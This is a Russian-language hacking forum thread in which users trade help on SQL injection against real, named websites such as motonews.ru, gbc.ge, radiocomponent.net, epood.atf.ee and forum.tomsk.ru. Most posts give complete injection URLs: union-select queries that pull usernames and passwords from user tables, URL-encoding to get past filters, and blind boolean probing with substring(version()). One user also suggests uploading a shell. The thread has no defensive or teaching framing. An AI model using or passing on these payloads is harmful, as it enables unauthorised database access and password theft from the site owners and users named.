Такая ситуация: есть таблица юзеров форума - abc_user. Таблица находится в базе - abc-forum. Когда я пишу скулю site.com/fname.php?id=-1+union+select+1,username,2+from+abc-forum.abc_user/* выводиться такая ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.abc_user/*' Проблема как я понимаю в тире в имени базы. Подскажите, что делать с этим тире?
У меня как-то фильтровалось нижнее подчеркивание и точка. Вышел из положения урл кодированием... незнаю как это понимать но факт был. Кодировал название таблицы в урл коды и запрос работал без этого нет.
Нашел инъекцию, не blind, только при следующем запросе http://www.motonews.ru/news.moto?id=-1+union+select+1,password,3,4,5+from+aprilia_aprilia.user/*&catid=52 сообщение об ошибке пропадает и страница отображается без проблем. load_file вроде работает. Скорее всего, настроена фильтрация. Может попробовать шелл залить? Или пытаться обойти фильтр?
Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит! Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus
1) Если ты уверен что какие то поля выводятся, то скорее всего ты не правильно подобрал кол-во колонок (или не правильно составил подзапрос). Так что вначале перепроверь как ты все сделал. 2) Версия мускула может быть 3 и тогда твой подзапрос будет бесполезен, с такой версией ты мало чего сделаешь. 3) Иногда вывод может быть виден в исходниках страницы (я про html, а не php), т.е. для просмотра идешь в Вид-Исходный текст (это в опере) и там находишь колонки которые вывелись. Да кстати если тебе нужно будет закрыть какой нидь тег, то прям так и дописываешь, к примеру: concat('</title>',выводимая в теге колонка) - тогда тут вывод будет уже не в тайтале, а на самой странице. 4) Если есть sql-инъекция то можешь попробывать посимвольный брут (+and+substring(version(),1,1)=5 и т.д.). Правда это займёт очень много времени.
Вообщем инъекция там есть, правда слепая =\ Для того чтобы была не слепая надо зарегаться на сайте, а это только за $ - поэтому тут надо выбирать либо на халяву но ппц как долго, либо заплатить 1$ и в течении часа все слить =) Со слепой (если решишь все-таки продолжить) есть один нюанс - подзапросы с and не катят, поэтому надо через or - соответственно логика обратная, пример: Code: http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=5)/*&lang=rus такой запрос выведет норм страницу - значит первая цифра версии не 5! а вот такой запрос Code: http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=4)/*&lang=rus выведет пустую страницу - значит первая цифра версии 4! Вообщем я думаю логика понятна =) Версия там 4.x.x.(MySQL) дальше если есть желание перебором как написал Grey по именам таблиц, столбцов и т.д...
Хм, да есть... просто во-первых меня смутило отсутсвие and, а во-вторых я наверное че-то напутал, так как когда я пробовал после его запроса (после отсечения /*) поставить кавычку вылетала ошибка, вобщем глюканул или я или... скорее всего я
Помогите пожалуйста никак не могу подобрать количество полей. Пробовал и order by и group by и вручную дошел до 43 ничего не получается??? HTML: http://www.radiocomponent.net/prices.php?companyPK=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+companies+limit+0,1/*
Хех, тут инъекция в select как я понял, это значит надо еще таблицу подбирать вот пример того как: Code: http://sirius.ldz.lv/sari/saraksts.asp?lngg=lv%20from%20table1-- если подобрать это, то можно нарыть че нить например из системных таблиц sysibm можно узнать версию, пользователя и название базы, также после подбора можно будет узнать таблицы и колонки и соответственно вывести какуюто инфу из этого всего ЗЫ я в DB2 неочень, так что поправьте меня если я неправ ЗЗЫ Можно наверное и из других скриптов что то узнать, но меня самого именно этот вариант заинтересовал, т.к. инъекцию в Select я первый раз увидел
вот кажется нашёл sql инекцию http://epood.atf.ee/index.php?categoryID=402' пробовал подобрать поля,перебрал 50 полей , но ничего не получилось подскажите что не так сделал и есть ли там вообще инекция? п.с. подбирал:id=9999+union+select+null,null,null......../* и так далее
http://epood.atf.ee/index.php?categoryID=-402+order+by+1/* http://epood.atf.ee/index.php?categoryID=-402+union+select+1/* смотреть вывод в коде страницы.
Подскажите что можно сделать с этой скулей код: http://forum.tomsk.ru/forum.php?a=9&g=34+order+by+9/*&t=713344 при запросе юнион селект кидает на главную страницу
2 fobofob На том же сайте вот тут http://forum.tomsk.ru/forum.php?a=24&user_id=-1357+union+select+111,222,3,4,555,666,7,8,9,10/* такой проблемы нету. Надеюсь помог
